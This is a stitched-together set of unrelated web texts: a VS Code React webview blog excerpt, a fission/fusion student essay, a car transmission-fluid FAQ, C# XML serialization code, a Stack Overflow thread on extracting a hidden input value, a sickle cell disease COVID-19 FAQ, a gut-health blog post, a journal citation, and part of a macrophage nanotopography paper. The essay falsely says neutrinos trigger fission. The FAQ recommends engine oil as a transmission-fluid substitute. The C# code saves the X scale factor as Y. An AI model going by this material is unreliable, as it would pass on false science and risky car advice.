vscodes.Uri, we can map out the physical location of the compiled react scripts, and import them into the html with VS Codes resource tags. function getWebviewContent(context: vscode.ExtensionContext): string { const { extensionPath } = context; const webviewPath: string = path.join(extensionPath, 'dist', 'webview'); const assetManifest: AssetManifest = require(path.join(webviewPath, 'asset-manifest.json')); const main: string = assetManifest.files['main.js']; const styles: string = assetManifest.files['main.css']; const runTime: string = assetManifest.files['runtime-main.js']; const chunk: string = Object.keys(assetManifest.files).find((key) => key.endsWith('chunk.js')) as string; const mainUri: vscode.Uri = vscode.Uri.file(path.join(webviewPath, main)).with({ scheme: 'vscode-resource' }); const stylesUri: vscode.Uri = vscode.Uri.file(path.join(webviewPath, styles)).with({ scheme: 'vscode-resource' }); const runTimeMainUri: vscode.Uri = vscode.Uri.file(path.join(webviewPath, runTime)).with({ scheme: 'vscode-resource' }); const chunkUri: vscode.Uri = vscode.Uri.file(path.join(webviewPath, chunk)).with({ scheme: 'vscode-resource' }); return ` <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Todo Task Manager</title> <link rel="stylesheet" type="text/css" href="${stylesUri.toString(true)}"> </head> <body> <div id="root"></div> <script crossorigin="anonymous" src="${runTimeMainUri.toString(true)}"></script> <script crossorigin="anonymous" src="${chunkUri.toString(true)}"></script> <script crossorigin="anonymous" src="${mainUri.toString(true)}"></script> </body> </html> `; } Now when I run the debugger for my extension and trigger the Todo Manager command. The React app appears as a VS Code Panel!! Issues and Concerns with current implementation. I am not 100% happy with this solution. I am not a fan of a sub npm package and managing the react build separately than the extension. A great example of why I dislike it is the eslint issue I didn't expect to happen. I also dislike how I have to compile the react app separately and then compile the extension to make it work. I need to work on my npm scripts to make it more seamless. One benefit of treating it like a separate app is I can run react in my browser to quickly develop the front end portion and then test it out as a webview panel later. This is all just a proof of concept for now. There is a more official way to implement web views that I plan on using now that I know it works. Next steps I need to figure out how to make the react app and the extension communicate with each other. I have seen some existing open source projects using RPC (Not sure what that is) but I have also seen some using a postMessage() && onMessage() method. Over the next couple of days, I'll be investigating what I can do and document my efforts. I also want a more trendy name. Todo Task Manager is just not sitting well with me. Source Code
__label__pos
0.619402
Fission and Fusion Only available on StudyMode • Topic: Neutron, Nuclear fusion, Proton • Pages : 2 (398 words ) • Download(s) : 101 • Published : March 17, 2013 Open Document Text Preview Fission Essay Fission is the act or process of splitting into two parts. It is also a nuclear reaction in which an atomic nucleus splits into fragments releasing from 100 million to several hundred million electron volts of energy. An atom contains protons and neutrons in its central nucleus. In fission, the nucleus splits, either through radioactive decay or because it has been bombarded by other subatomic particles known as neutrinos. The resulting pieces have less combined mass than the original nucleus, with the missing mass converted into nuclear energy. Controlled fission occurs when a very light neutrino bombards the nucleus of an atom, breaking it into two smaller nuclei. The destruction releases a significant amount of energy, as much as 200 times that of the neutron that started the procedure, as well as releasing at least two more neutrinos. Controlled reactions of this sort are used to release energy within nuclear power plants. Uncontrolled reactions can fuel nuclear weapons. Radioactive fission, where the center of a heavy element spontaneously emits a charged particle as it breaks down into a smaller nucleus. This reaction does not occur often and happens only with the heavier elements. Fusion Essay Fusion is the reaction in which two atoms of hydrogen combine together to form an atom of helium. In the process some of the mass of the hydrogen is converted into energy. The easiest fusion reaction to make happen is combining deuterium (or “heavy hydrogen) with tritium (or “heavy-heavy hydrogen”) to make helium and a neutron. Deuterium is plentifully available in ordinary water. Tritium can be produced by combining the fusion neutron with the abundant light metal lithium. Thus fusion has the potential to be an inexhaustible source of energy. To make Fusion happen, the atoms of hydrogen must be heated to very high temperatures so they are ionized, forming a plasma, and have sufficient energy to fuse, and then be held together long... tracking img
__label__pos
0.965291
Can you add transmission fluid yourself? You can add more by inserting a funnel into the tube the dipstick was withdrawn from and pouring a small amount of automatic transmission fluid into the pipe. Check the level each time you add a little until the level is right between the two lines. Can I just add transmission fluid without changing it? Most service centers and shops do not charge any more or less to flush or change your transmission fluid than an oil change. However, like oil changes, you can even do this yourself. … The old fluid will contaminate the new fluid you introduce. That last part is why flushing the fluid is the best way to deal with this. What are the symptoms of low transmission fluid? Signs of Low Transmission Fluid • Noises. If your transmission is working properly, you shouldn’t hear any noise while you’re driving as it should transition smoothly. … • Burning Smell. Any foul smell coming from your car should direct you to your nearest service center. … • Transmission Leaks. … • Slipping Gears. THIS IS EXCITING:  Frequent question: When did cars get electric starters? Can you fill transmission fluid through dipstick? Observe markings at end of dipstick. Your dipstick might have two markings for “full”—one warm, one cold. If the automatic transmission fluid level does not come up to the “warm” line, you’ll need to add automatic transmission fluid. Insert long funnel into automatic transmission fluid dipstick hole. Can you mix old and new transmission fluid? You should not mix the old transmission fluid with a new one. The main reason is it won’t offer you the ideal viscosity. At the same time, the mixing will reduce the performance of the transmission system. So it will cause overall engine performance. What can I use if I don’t have transmission fluid? Any light weight quality engine oil or hydraulic fluid will work 5 to 10 single weight or multi weigh 5W-30, 10w 30. What happens if you drive with low transmission fluid? Driving your car through a low transmission fluid level is dangerous to you and the vehicle. Failure to top up the fluid is a hazard that might cause extreme damage to the transmission, the engine, and essential components that keep the car running. How long should I let my car run before checking the transmission fluid? 1) Prepare the Vehicle Set the parking brake and start the engine. Let it run for about 5 minutes so that it can warm up. Some car manufacturers will recommend you turn the engine off before checking the transmission fluid, but most don’t recommend this. What happens if you put too much transmission fluid in your car? If you add too much transmission fluid, you will notice that it may foam, and that can bring about erratic gear shifting. Some other problems that may arise include oil starvation and transmission damage. … Adding too much transmission fluid can also cause early failure and damage of parts as result of excess pressure. THIS IS EXCITING:  How much does it cost to recalibrate my windshield? What happens if you overfill transmission fluid? If you overfill it, the transmission will experience hard shifting and slippage. Another consequence of overfilling your transmission is that it will cause the fluid to lose its lubricating properties. It could also lead to the entire system blowing up and not functioning. Is it OK to mix transmission fluid brands? Yes. Synthetic ATF and conventional fluids are 100 percent compatible with each other. What does black transmission fluid mean? Nearly black or black transmission fluid means the fluid is old, very dirty, contaminated, and if paired with a burnt toast smell, has oxidized. At this point, your transmission is telling you something is wrong. If your transmission is showing signs of slipping or hesitation, repair or replacement may be in order.
__label__pos
0.999943
Example #1 0 /// <summary> /// Here is actual save method. Element should be already created one /// </summary> /// <param name="node"></param> public virtual void SaveItem(XmlDocument doc, System.Xml.XmlElement element) { UnitsManager unitMng = new UnitsManager(); // save name attribute XmlAttribute attr = doc.CreateAttribute("Name"); attr.Value = Name; element.SetAttributeNode(attr); // save location XmlElement el = doc.CreateElement("Location"); attr = doc.CreateAttribute("PositionX"); attr.Value = LocationInUnitsX.ToString() + unitMng.UnitToString(MeasureUnit); el.SetAttributeNode(attr); attr = doc.CreateAttribute("PositionY"); attr.Value = LocationInUnitsY.ToString() + unitMng.UnitToString(MeasureUnit); el.SetAttributeNode(attr); element.AppendChild(el); // save Width and Height. This is same as shape but generator wants those information as well el = doc.CreateElement("Width"); attr = doc.CreateAttribute("Value"); attr.Value = this.WidthInUnits.ToString() + unitMng.UnitToString(MeasureUnit); el.SetAttributeNode(attr); element.AppendChild(el); el = doc.CreateElement("Height"); attr = doc.CreateAttribute("Value"); attr.Value = this.HeightInUnits.ToString() + unitMng.UnitToString(MeasureUnit); el.SetAttributeNode(attr); element.AppendChild(el); el = doc.CreateElement("WidthInPixels"); attr = doc.CreateAttribute("Value"); attr.Value = this.WidthInPixels.ToString(); el.SetAttributeNode(attr); element.AppendChild(el); el = doc.CreateElement("HeightInPixels"); attr = doc.CreateAttribute("Value"); attr.Value = this.HeightInPixels.ToString(); el.SetAttributeNode(attr); element.AppendChild(el); // save Shape el = doc.CreateElement("Shape"); attr = doc.CreateAttribute("Type"); attr.Value = "Rectangle"; el.SetAttributeNode(attr); XmlElement el2 = doc.CreateElement("Dimensions"); attr = doc.CreateAttribute("Width"); attr.Value = this.WidthInUnits.ToString() + unitMng.UnitToString(MeasureUnit); el2.SetAttributeNode(attr); el.AppendChild(el2); attr = doc.CreateAttribute("Height"); attr.Value = this.HeightInUnits.ToString() + unitMng.UnitToString(MeasureUnit); el2.SetAttributeNode(attr); el.AppendChild(el2); element.AppendChild(el); // Save Scale el = doc.CreateElement("Scale"); attr = doc.CreateAttribute("x"); attr.Value = this.ScaleXFactor.ToString(); el.SetAttributeNode(attr); attr = doc.CreateAttribute("y"); attr.Value = this.ScaleXFactor.ToString(); el.SetAttributeNode(attr); element.AppendChild(el); // save transformations el = doc.CreateElement("Transformation"); attr = doc.CreateAttribute("a"); attr.Value = this.TransformationMatrix.Elements[0].ToString(); el.SetAttributeNode(attr); attr = doc.CreateAttribute("b"); attr.Value = this.TransformationMatrix.Elements[1].ToString(); el.SetAttributeNode(attr); attr = doc.CreateAttribute("c"); attr.Value = this.TransformationMatrix.Elements[2].ToString(); el.SetAttributeNode(attr); attr = doc.CreateAttribute("d"); attr.Value = this.TransformationMatrix.Elements[3].ToString(); el.SetAttributeNode(attr); element.AppendChild(el); // save rotation el = doc.CreateElement("Rotation"); attr = doc.CreateAttribute("Value"); attr.Value = this.RotationAngle.ToString(); el.SetAttributeNode(attr); element.AppendChild(el); // save dock position el = doc.CreateElement("DockPosition"); attr = doc.CreateAttribute("Dock"); attr.Value = this.DockPositionString; el.SetAttributeNode(attr); element.AppendChild(el); // save anchor properties if(anchor != null) { el = doc.CreateElement("Anchor"); attr = doc.CreateAttribute("Top"); attr.Value = this.anchor.TopAnchor.ToString(); el.SetAttributeNode(attr); attr = doc.CreateAttribute("Bottom"); attr.Value = this.anchor.Bottomanchor.ToString(); el.SetAttributeNode(attr); attr = doc.CreateAttribute("Left"); attr.Value = this.anchor.LeftAnchor.ToString(); el.SetAttributeNode(attr); attr = doc.CreateAttribute("Right"); attr.Value = this.anchor.RightAnchor.ToString(); el.SetAttributeNode(attr); element.AppendChild(el); } } Example #2 0 /// <summary> /// Set the handle /// </summary> /// <param name="oNode"></param> /// <param name="strHandle"></param> private void SetHandle(System.Xml.XmlElement oNode, string strHandle) { if (strHandle != null && strHandle.Length != 0) { System.Xml.XmlAttribute hAttr; hAttr = oNode.OwnerDocument.CreateAttribute(Constant.Attribute.HANDLE_ATTR); hAttr.Value = strHandle; oNode.SetAttributeNode(hAttr); } }
__label__pos
0.99194
Jump to Main Content COVID-19 Resources COVID-19 and Sickle Cell Disease: Frequently Asked Questions (Version 4.0; last updated June 18, 2020) Input from Drs. Arun Shet, Ken Ataga, Ted Wun, Matthew Hseih, Allison King, Rakhi Naik, Alexis Thompson, and Michael DeBaun Note: Please review ASH's disclaimer regarding the use of the following information. How do people with sickle cell disease (SCD) do with COVID-19? Patients with SCD often have underlying cardiopulmonary co-morbidities that may predispose them to poor outcomes if they become infected with SARS-CoV-2. Data are being collected by the international COVID-19 sickle cell disease registry and by the ASH Registry, and providers are encouraged to report their SCD patients with COVID-19. The Sickle Cell Disease Association of America updates its recommendations frequently about best practices for the care of SCD patients in the era of COVID-19. Below, we address FAQs that arise most commonly from providers less familiar with SCD. How should I evaluate respiratory symptoms in children and adults with an active COVID-19 infection? There is significant overlap in presenting symptoms between COVID-19, acute chest syndrome (ACS) and other infectious causes of pneumonia. Providers should test for COVID-19 and other infectious pathogens and have a low threshold for imaging. COVID-19 most commonly presents with a more diffuse ground glass appearance, versus more localized infiltrates consistent with pneumonia or ACS. These findings are not always distinct, and all possibilities should remain in the differential. A detailed checklist for evaluating SCD patients with these symptoms in the emergency department has been developed by ASH in collaboration with ED physicians. Often transfusion therapy is the only effective therapy for respiratory failure due to ACS, with a goal to reduce the hemoglobin S (HbS) level to approximately 15% via exchange transfusion, in order to ensure that HbS levels remain less than 30% for approximately 4 weeks. Post automated exchange transfusion the hemoglobin should be targeted between 10 and 12g/dL to maximize oxygen carrying capacity. Whether reducing HbS via transfusion improves outcome in COVID-19 respiratory failure is unknown, but decreased sickling in this setting as in ACS is desirable. Transfer to another facility should be strongly considered early after presentation if automated exchange transfusion therapy cannot be performed. Simple transfusion can be given in the interim, with avoidance of hyperviscosity by targeting a post infusion Hb of less than 10g/dL. Should I change my use of exchange transfusion for neurological acute symptoms suggesting a stroke or transient ischemic attack? For acute stroke presentation or transient ischemic attack (TIA), we recommend reducing the percent HbS level to approximately 15% via exchange transfusion. This strategy provides sustained HbS levels less than 30% for approximately 4 weeks and is consistent with the ASH CNS guidelines recommendations for management of acute strokes and TIAs. Early reduction in HbS has been associated with better outcomes after stroke. Simple transfusion can be given while preparing for exchange transfusion, with avoidance of hyperviscosity by targeting a post infusion Hb less than 10g/dL. Should I change my use of exchange transfusion or regular blood transfusion for primary and secondary stroke prevention, secondary prevention of ACS, pain or priapism? At present, transfusion practices in children and adults with SCD are being modified on a case by case basis as determined by individual physicians and practice groups. Some providers are electing to relax exchange transfusion endpoints (i.e. allowing 40% HbS) or switching to simple exchange transfusion (for an interim period) to minimize unit consumption. In areas where severe blood shortages are expected or already occuring, some providers are initiating hydroxyurea in patients on routine blood transfusions because the transition to maximum tolerated dose of hydroxyurea may require up to 6 months to be fully effective. Based on efficacy of hydroxyurea for primary and secondary stroke prevention as compared to no red blood cell transfusion, we would consider starting low dose hydroxyurea in children with an indication for primary or secondary stroke prevention, if blood transfusion services are likely to be interrupted1, after discussion with the family and transfusion service personnel. Randomized controlled trial data are not available, but a similar strategy for secondary prevention of stroke is also reasonable for adults. The evidence for transfusions as secondary prevention of ACS, pain and priapism have not been evaluated prospectively in randomized controlled trials, but rather analyzed posthoc from stroke prevention studies. Collectively, these data, along with extensive clinical experience, suggest that regular blood transfusions do decrease the incidence of acute chest syndrome, acute pain and priapism events, and thus transfusion therapy should be continued on an individualized basis if possible for these indications. Should we alter approaches to transfusion thresholds and blood use in children and adults with SCD? The transfusion threshold for common clinical situations i.e., severe anemia, VOC, priapism, etc. may need adjustment due to blood shortages. Transfusions should be given for symptoms arising from severe anemia or acute complications (e.g. ACS or stroke), and not solely based on preestablished hemoglobin thresholds. How should one balance risk of hospitalization for acute painful vaso-occlusive episode management vs. risk of exposure to COVID-19? Where possible, consider telemedicine patient contact and optimize the use of oral opioids. To limit exposure to COVID-19, shift as many patients as feasible to receive intravenous narcotics in a day hospital if available rather than the emergency department. Minimizing provider cross coverage between outpatient/day hospital and inpatient units is desirable. Should a child or adult with severe COVID-19 infection receive therapeutic anticoagulation? No, they should receive only prophylactic doses, or “intermediate intensity” dosing (0.5mg/kg enoxaparin twice daily) per institutional ICU practice or as part of a clinical trial, unless there is an indication for full anticoagulation.2 For additional details, please see the COVID-19 VTE/anticoagulation FAQs. Is there any specific guidance you are giving patients that are considering stem cell transplantation or gene therapy for SCD? Many programs are preparing to resume non-emergent treatments including transplantation and gene therapies for SCD. Individuals should contact their primary hematologist or transplant center for updates. My patient usually receives antigen-matched red cells. Should I use non-matched units if there is a blood shortage? If possible, continue to transfuse antigen-matched units to prevent alloimmunization, unless blood transfusion is life-saving and time sensitive and matched units are not immediately available. For patients with a history of delayed hemolytic transfusions, at a minimum the minor red cell antigens should be matched for Rh (C, E or C/c, E/e), and K, and should lack any antigens identified in the DHTR evaluation. Additional matching should be considered for Jka/Jkb, Fya/Fyb, and S/s. A conversation with the local or regional blood bank personnel should occur to optimize the best potentially matched units. Immunosuppressive therapy should be considered on a case by case basis for DHTR. In patients with a history of hyperhemolysis, prophylactic immunosuppressive therapy is advised. For more information on transfusion management, see the ASH transfusion guidelines in SCD. Should I adjust doses of any SCD medications given the COVID-19 threat? If a patient is doing well, there is no reason to change any SCD medications because of the COVID-19 pandemic or actual infection. If COVID-19 rates remain high in your area, to reduce frequency of clinic and pharmacy visits consider telemedicine visits and increasing the supply of medication to 90 days as allowed. What is the role of recently approved disease-modifying drugs, voxelotor and crizanlizumab, during the COVID-19 pandemic? Patients on these medications should be continued. For patients with symptomatic baseline low hemoglobin levels or patients that are difficult to transfuse because of alloantibodies, voxelotor, a therapy designed to increase the baseline hemoglobin level, can be considered. The decision to begin this agent should be based on the relative benefits versus the risks and likelihood of a limited blood supply. References 1. De Baun, M. Initiating adjunct low dose-hydroxyurea therapy for stroke prevention in children with SCA during the C0VID-19 pandemic. In press, Blood 2020. 2. Connors, J and Levy, J. COVID-19 and its implications for thrombosis and anticoagulation. Blood 2020. For additional information, see: View All COVID-19 FAQs Get Updates Sign up for email updates to stay abreast of the latest COVID-19 resources recommended by the American Society of Hematology. Sign up for email updates
__label__pos
0.987818
@article {Sasaki2909, author = {Sasaki, T and Kaibuchi, K and Kabcenell, A K and Novick, P J and Takai, Y}, title = {A mammalian inhibitory GDP/GTP exchange protein (GDP dissociation inhibitor) for smg p25A is active on the yeast SEC4 protein.}, volume = {11}, number = {5}, pages = {2909--2912}, year = {1991}, doi = {10.1128/MCB.11.5.2909}, publisher = {American Society for Microbiology Journals}, abstract = {Evidence is accumulating that smg p25A, a small GTP-binding protein, may be involved in the regulated secretory processes of mammalian cells. The SEC4 protein is known to be required for constitutive secretion in yeast cells. We show here that the mammalian GDP dissociation inhibitor (GDI), which was identified by its action on smg p25A, is active on the yeast SEC4 protein in inhibiting the GDP/GTP exchange reaction and is capable of forming a complex with the GDP-bound form of the SEC4 protein but not with the GTP-bound form. These results together with our previous findings that smg p25A GDI is found in mammalian cells with both regulated and constitutive secretion types suggest that smg p25A GDI plays a role in both regulated and constitutive secretory processes, although smg p25A itself may be involved only in regulated secretory processes. These results also suggest that a GDI for the SEC4 protein is present in yeast cells.}, issn = {0270-7306}, URL = {https://mcb.asm.org/content/11/5/2909}, eprint = {https://mcb.asm.org/content/11/5/2909.full.pdf}, journal = {Molecular and Cellular Biology} }
__label__pos
0.953216
Stack Overflow is a community of 4.7 million programmers, just like you, helping each other. Join them; it only takes a minute: Sign up Join the Stack Overflow community to: 1. Ask programming questions 2. Answer and help your peers 3. Get recognized for your expertise I want to grab the value of a hidden input field in HTML. <input type="hidden" name="fooId" value="12-3456789-1111111111" /> I want to write a regular expression in Python that will return the value of fooId, given that I know the line in the HTML follows the format <input type="hidden" name="fooId" value="**[id is here]**" /> Can someone provide an example in Python to parse the HTML for the value? share|improve this question up vote 27 down vote accepted For this particular case, BeautifulSoup is harder to write than a regex, but it is much more robust... I'm just contributing with the BeautifulSoup example, given that you already know which regexp to use :-) from BeautifulSoup import BeautifulSoup #Or retrieve it from the web, etc. html_data = open('/yourwebsite/page.html','r').read() #Create the soup object from the HTML data soup = BeautifulSoup(html_data) fooId = soup.find('input',name='fooId',type='hidden') #Find the proper tag value = fooId.attrs[2][1] #The value of the third attribute of the desired tag #or index it directly via fooId['value'] share|improve this answer      I think that the "new" keyword is a mismatch. – Andrea Francia May 12 '11 at 13:27 I agree with Vinko BeautifulSoup is the way to go. However I suggest using fooId['value'] to get the attribute rather than relying on value being the third attribute. from BeautifulSoup import BeautifulSoup #Or retrieve it from the web, etc. html_data = open('/yourwebsite/page.html','r').read() #Create the soup object from the HTML data soup = BeautifulSoup(html_data) fooId = soup.find('input',name='fooId',type='hidden') #Find the proper tag value = fooId['value'] #The value attribute share|improve this answer      'new' ? That's not python! – habnabit Jan 27 '09 at 2:58 import re reg = re.compile('<input type="hidden" name="([^"]*)" value="<id>" />') value = reg.search(inputHTML).group(1) print 'Value is', value share|improve this answer Parsing is one of those areas where you really don't want to roll your own if you can avoid it, as you'll be chasing down the edge-cases and bugs for years go come I'd recommend using BeautifulSoup. It has a very good reputation and looks from the docs like it's pretty easy to use. share|improve this answer 1   I agree for a general case, but if you're doing a one-off script to parse one or two very specific things out, a regex can just make life easier. Obviously more fragile, but if maintainability is a non-issue then it's not a concern. That said, BeautifulSoup is fantastic. – Cody Brocious Sep 10 '08 at 22:13      I love regex, but have to agree with Orion on this one. This is one of the time when the famous quote from Jamie Zawinski comes to mind: "Now you have two problems" – Justin Standard Sep 10 '08 at 22:29 Pyparsing is a good interim step between BeautifulSoup and regex. It is more robust than just regexes, since its HTML tag parsing comprehends variations in case, whitespace, attribute presence/absence/order, but simpler to do this kind of basic tag extraction than using BS. Your example is especially simple, since everything you are looking for is in the attributes of the opening "input" tag. Here is a pyparsing example showing several variations on your input tag that would give regexes fits, and also shows how NOT to match a tag if it is within a comment: html = """<html><body> <input type="hidden" name="fooId" value="**[id is here]**" /> <blah> <input name="fooId" type="hidden" value="**[id is here too]**" /> <input NAME="fooId" type="hidden" value="**[id is HERE too]**" /> <INPUT NAME="fooId" type="hidden" value="**[and id is even here TOO]**" /> <!-- <input type="hidden" name="fooId" value="**[don't report this id]**" /> --> <foo> </body></html>""" from pyparsing import makeHTMLTags, withAttribute, htmlComment # use makeHTMLTags to create tag expression - makeHTMLTags returns expressions for # opening and closing tags, we're only interested in the opening tag inputTag = makeHTMLTags("input")[0] # only want input tags with special attributes inputTag.setParseAction(withAttribute(type="hidden", name="fooId")) # don't report tags that are commented out inputTag.ignore(htmlComment) # use searchString to skip through the input foundTags = inputTag.searchString(html) # dump out first result to show all returned tags and attributes print foundTags[0].dump() print # print out the value attribute for all matched tags for inpTag in foundTags: print inpTag.value Prints: ['input', ['type', 'hidden'], ['name', 'fooId'], ['value', '**[id is here]**'], True] - empty: True - name: fooId - startInput: ['input', ['type', 'hidden'], ['name', 'fooId'], ['value', '**[id is here]**'], True] - empty: True - name: fooId - type: hidden - value: **[id is here]** - type: hidden - value: **[id is here]** **[id is here]** **[id is here too]** **[id is HERE too]** **[and id is even here TOO]** You can see that not only does pyparsing match these unpredictable variations, it returns the data in an object that makes it easy to read out the individual tag attributes and their values. share|improve this answer /<input type="hidden" name="fooId" value="([\d-]+)" \/>/ share|improve this answer /<input\s+type="hidden"\s+name="([A-Za-z0-9_]+)"\s+value="([A-Za-z0-9_\-]*)"\s*/>/ >>> import re >>> s = '<input type="hidden" name="fooId" value="12-3456789-1111111111" />' >>> re.match('<input\s+type="hidden"\s+name="([A-Za-z0-9_]+)"\s+value="([A-Za-z0-9_\-]*)"\s*/>', s).groups() ('fooId', '12-3456789-1111111111') share|improve this answer Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.908474
What’s Up With The Gut?: why you should be concerned with gut health and what to do about it Gut health and the concept of “leaky gut” has become a hot topic these days and for good reason. Have you wondered if poor gut health could be playing a role in your life and what you can do about it? The term “gut health” has become increasingly popular, but if you feel unsure about how this affects your health or weight, you are not alone! Let’s take a close look at this trendy nutrition topic. What is gut health? The term gut health refers to the digestion and absorption of the food you eat, the integrity of your gut lining and the status of the immune systems located in your gut. The state of your gut is associated with every system in your body, including your cells, organs and numerous biochemical processes. If you can’t properly break down (digest) the food you eat and/or absorb the vital nutrients your food provides,  your body will not get what it needs to maintain proper structure and function. Why does gut health matter? Hippocrates said over 2000 years ago that all disease starts in the gut and it turns out he was right! If gut health is impaired you will not feel your best, because of the roles discussed above. Often, poor gut health is at the root of many chronic diseases. Addressing and fixing poor gut function can improve not only diseases of the GI tract such as Irritable Bowel Syndrome and Inflammatory Bowel Disease but it may also improve those that aren’t as commonly associated with your digestive system such as autoimmune conditions, thyroid disease, chronic fatigue, depression and even weight management issues. What can you do to help repair your gut health? Here are 3 simple steps to put you on the right track to supporting the gut: 1. Stop damaging the gut. The first step is to remove things that may be causing inflammation in the gut. The gut will not be able to heal if you continue to come in contact with things that promote inflammation. Consider removing or limiting the following: refined carbohydrates, added sugar, highly processed foods, artificial sweeteners, alcohol, unnecessary antibiotics, low quality supplements with additives and fillers, stress, excessive exercise, and foods with the potential to cause sensitivities or allergies.  It is also important to assess for chronic gut infections that may be causing ongoing damage. This may sound like a lot, but the best way to accomplish this is to work with a Functional/Integrative Physician or Registered Dietitian who can help restore your gut health. 1. Support the gut to heal existing damage. The second step is to provide the gut with supportive foods and supplements that will help the healing process. Focus on anti-inflammatory foods like, healthy fats, fermented foods, and plenty of vegetables and fruit. In addition consider adding extra support by supplementing with a high quality probiotic, fish oil and L-glutamine. Talk to your Integrative or Functional medicine provider today for recommendations on supplement quality and dosing. 1. Continue gut healthy habits. Gut issues are not healed overnight. It takes time and consistency to see results. Trust in the process and continue to choose foods that will support a healthy gut. Follow this easy three-step process to begin healing and move you one step closer to feeling your best. If you need extra support don’t be afraid to reach out. Asking for help is a sign of strength, not weakness! Premier Integrative Health specializes in finding and addressing the underlying causes of chronic disease. To get more information about Premier Integrative Health vist our website by clicking here Written by: Abby Stanley, MS RDN LD Abby has recently joined the PIH team as a Functional Nutritionist. She is also the owner and CEO of Revive Nutrition Solutions, LLC. She loves helping others improve their health and life through nutrition an advocate for eating REAL food!
__label__pos
0.762775
Open Access Control of growth and inflammatory response of macrophages and foam cells with nanotopography • Mohammed Mohiuddin1, • Hsu-An Pan1, • Yao-Ching Hung2, 3 and • Guewha Steven Huang1Email author Nanoscale Research Letters20127:394 https://doi.org/10.1186/1556-276X-7-394 Received: 14 December 2011 Accepted: 19 April 2012 Published: 16 July 2012 Abstract Macrophages play an important role in modulating the immune function of the human body, while foam cells differentiated from macrophages with subsequent fatty streak formation play a key role in atherosclerosis. We hypothesized that nanotopography modulates the behavior and function of macrophages and foam cells without bioactive agent. In the present study, nanodot arrays ranging from 10‐ to 200‐nm were used to evaluate the growth and function of macrophages and foam cells. In the quantitative analysis, the cell adhesion area in macrophages increased with 10- to 50-nm nanodot arrays compared to the flat surface, while it decreased with 100- and 200-nm nanodot arrays. A similar trend of adhesion was observed in foam cells. Immunostaining, specific to vinculin and actin filaments, indicated that a 50-nm surface promoted cell adhesion and cytoskeleton organization. On the contrary, 200-nm surfaces hindered cell adhesion and cytoskeleton organization. Further, based on quantitative real-time polymerase chain reaction data, expression of inflammatory genes was upregulated for the 100- and 200-nm surfaces in macrophages and foam cells. This suggests that nanodots of 100‐ and 200‐nm triggered immune inflammatory stress response. In summary, nanotopography controls cell morphology, adhesions, and proliferation. By adjusting the nanodot diameter, we could modulate the growth and expression of function-related genes in the macrophages and foam cell system. The nanotopography-mediated control of cell growth and morphology provides potential insight for designing cardiovascular implants. Keywords Cell adhesionNanotopographyMacrophagesFoam cellBiocompatibleInflammatory response Background Recent fabrication of nanostructured materials with different surface properties has generated a great deal of interest for developing implant materials, i.e., cardiovascular, dental, orthopedic, percutaneous, subcutaneous, and auditory[15]. The interface between nanostructured materials and biological tissues is likely to vary dependent upon the surface properties of the nanomaterial. Understanding the degree of toxicity induced by the unique cellular interaction of nanostructured materials is a major concern before utilization in biomedical applications[68]. Therefore, fabricating biocompatible materials which are designed to perform specific functions within living organisms has become a key component for generating nanodevices for biomedical applications, including implants. Macrophages play a critical role during innate and acquired immune responses through the phagocytosis of foreign material. During an immune response, macrophages are typically the first cell type to respond and will secrete proteins (cytokines and chemokines) in order to recruit more immune cells to the site of injury. Atherosclerosis is a pathological process that takes place in the major arteries and is the underlying cause of heart attacks, stroke, and peripheral artery disease. The earliest detectable lesions, called fatty streaks, contain macrophage foam cells that are derived from recruited monocytes. The formation of these foam cells correlates to inflammatory responses[911]. In particular, immune cells such as monocytes and macrophages play a key role in mediating host tissue response to implants in the foreign body reaction.One study demonstrated that the macrophage receptor with collagenous structure (MARCO) displayed limited expression in healthy cells but increased in expression around the synovial fluid following hip replacements[12]. This study indicated that the presence of a foreign body can generate an immune response, and the continued presence of the foreign body can potentially lead to macrophage buildup and production of foam cells. Recent reports have shown that microscaled landscapes are able to direct shape and migration of cultured cells. When cultured on ridges and grooves of nanoscale dimensions, cells migrate more extensively to the ridges than into the grooves. Cell shape is aligned and extended in the direction of the groove[13]. Osteoblasts grown on a fibrous matrix composed of multiwalled carbon nanofibers (100-nm in diameter) exhibit increased proliferation compared to those on flat glass surfaces[1416]. Nanodots larger than 100-nm in diameter induced an apoptosis-like morphology for NIH-3T3 fibroblast cells[17]. Breast epithelial cells proliferate and form multicellular spheroids on interwoven polyamide fibers fabricated using electrospinning polymer solution onto a glass slide[18]. A 3-D nanofibrillar surface covalently modified with tenascin-C-derived peptides enhances neuronal growth in vitro[19]. The cardiomyoblast H9c2 shows induced cell adhesion and cytoskeleton organization on nanodot arrays smaller than 50-nm[20]. Recently, arrays of nanodots with defined diameter and depth have been fabricated using aluminum nanopores as a template during oxidation of tantalum thin films[21]. The pore size of aluminum oxide is controllable and uniformly distributed; the depth of dots depends on the voltage applied; thus, it can serve as a convenient mold to fabricate tantalum into a nanodot array of specific diameter and depth. The structure containing nanodots of uniform size could serve as a comparable nanolandscape to probe cellular response at the molecular level. Although many implant surface topographies are commercially available, there is generally a lack of detailed comparative histological studies at the nano-interface that document how these surfaces interact with living cells, in particular immune cells. In the present study, different sizes of nanodot arrays ranging from 10- to 200-nm were used to evaluate the growth and inflammatory response of macrophages and foam cells. Methods Chemicals Dulbecco’s modified Eagle medium (DMEM), FBS, antibiotics, and all other tissue culture reagents were obtained from Gibco (Life Technologies, Carlsbad, CA, USA). Glutaraldehyde and osmium tetroxide were purchased from Electron Microscopy Sciences (Hatfield, PA, USA). Anti-vinculin mouse antibody was purchased from Abcam (Cambridge, MA, USA). Alexa Fluor 594 phalloidin and Alexa Fluor 488 goat anti-mouse IgG were purchased from Invitrogen (Carlsbad, CA, USA). Trypsin was purchased from Sigma-Aldrich (St. Louis, MO, USA). CuSO4, KBr, thiobarbituric acid, trichloroacetic acid, and other commonly used chemicals were purchased from Sigma-Aldrich or Merck (Whitehouse Station, NJ, USA). Isolation of mouse peritoneal macrophages and formation of foam cells Resident peritoneal macrophages were isolated and cultured from five mice (20 g each) and were washed once with DMEM and once with DMEM containing 10% fetal bovine serum. The cells were seeded on to different nanodot arrays, ranging from 10- to 200-nm, in DMEM containing 10% fetal bovine serum and 100 pg/ml penicillin and cultured for 3 to 4 h at 37°C in an incubator containing 5% CO2 with 90% humidity. The nonadherent cells were removed, and the monolayers were then placed in DMEM containing 10% fetal bovine serum supplemented with 100 μg/ml oxidized low-density lipoprotein (ox-LDL) or acetyl LDL; plates were further incubated for an additional 72 h. Oil red O staining 